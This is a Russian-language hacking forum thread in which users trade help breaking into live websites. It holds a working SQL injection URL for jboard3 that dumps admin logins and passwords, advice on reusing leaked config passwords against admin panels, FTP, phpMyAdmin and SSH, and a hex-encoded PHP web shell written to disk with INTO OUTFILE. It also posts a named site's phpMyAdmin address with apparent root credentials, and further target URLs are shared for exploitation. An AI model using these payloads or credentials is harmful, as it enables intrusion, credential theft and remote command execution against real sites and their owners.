Проблема с фильтрацией двойных ковычек в ксс... В общем проблема: И так: Так-то оно вроде все нормально, но мне нужно выйти за приделы value, если подставить двойную кавычку, она фильтруется через htmlspecialchars()... Пробовал и так: Но пока безуспешно... Подскажите что-нибудь.
Есть скул на jboard3 Code: export.php?t=php&n=5&c=0&r=40%20UNION%20SELECT%201,2,3,4,concat%28table_schema,0x2e,TABLE_NAME%29%20FROM%20INFORMATION_SCHEMA.TABLES%23 Помогите выудить логин и пасс админа, структура таблиц вот: Code: `jb_admin` -- CREATE TABLE `jb_admin` ( `login` varchar(32) NOT NULL, `password` varchar(32) NOT NULL ) ENGINE=MyISAM DEFAULT CHARSET=utf8;
Как тебе уже сказали, подключиться удаленно к БД получится вряд ли. Ну тут есть пару вариантов: 1) попробовать вытащенный пасс из конфига к админке с юзером: admin, adm, administrator и с юзером, который был вытащен из конфига. 2) попробовать подключиться к FTP. пасс: из конфига. юзер: "админовские", из конфига который, из /etc/passwd 3) попробовать найти на домене phpMyAdmin и с данным пассом подключиться к ней. Юзеров опять же пробовать "админовских", из конфига который, из /etc/passwd 4) попробовать подключиться к SSH. Пароль из конфига. Юзеры: "админовские", root, из конфига, из /etc/passwd. P.S.: Если в /etc/passwd дохера юзеров (т.е. имя системного пользователя для каждого аккаунта на хостинге), то нет смысла пробовать пробить все! Тебе из /etc/passwd нужно имя пользователя-владельца, где ты нашел инклюд. bluesky На античате куча статей по SQL-иньекциям, советую почитать Запрос тебе нужен такой: export.php?t=php&n=5&c=0&r=40+UNION+SELECT+1,2,3,4,concat(login,0x3a,password)+FROM+jb_admin--+ Moriarty, ты не поставил комменатрий, без которого запрос может не обрезать и SQL-запрос вызовет ошибку. Ну и '::' нет смысла) А вдруг mq? Который обычно включен всегда. Правильнее захексить: 0x3a3a.
Требуется помощь в заливке шелла через phpMyAdmin 5.1.41-3ubuntu12.10:root@localhost:debian-linux-gnu file_priv=Y MQ=on
Перебрал более 30 папок, но такой не нашел. Сейчас пытаюсь залить через URL двойным запросом, но пока не очень получается.
а если не нашел тогда чем поможет тебе двойной запрос? все равно прав не будет, тама скани директории сайта,реверсни IP, мб найдеш инклуд в соседних сайтах
Делаю запрос: select 0x3c3f73797374656d28245f4745545b636d645d293f3e into outfile '/var/www/tmp/shell.php' Выдает Can't create/write to file '/var/www/ju/tmp/gen.php' (Errcode: 2) file_priv=Y
с чего ты взял что там есть данная папка? вот по адресу /tmp/ она всегда есть.. a в /var/www/ она может называтся как угодно temp, temporary..bla bla а может и не быть там
Попробуй сам залить шелл. http://www.japanupdate.com/phpmyadmin/ root:b3777@p@du7@ japanupdate:x:33:33::/var/www/ju/htdocs
+order+by+18446744073709551616+-- выводит без ошибки +order+by+18446744073709551615+-- выводит с ошибкой значит 18446744073709551616 столбцов? такое возможно?
это хэксированная штука, т.е. скажем 18446744073709551616=version() или что-то другое, хотя такое не встречал, может там блайнд идет.
в какой таблице IPB можно узнать адрес сайта (напободие wp_options в wordpress)? поиск по мылу не увенчался успехом.
Привет. Если не трудно, помогите, пожалуйста, раскрутить. http://www.orlyba[...:::G00GLE:::...]or.co.il/catin.asp?productid=163%27&catid=31&Contact_02=No
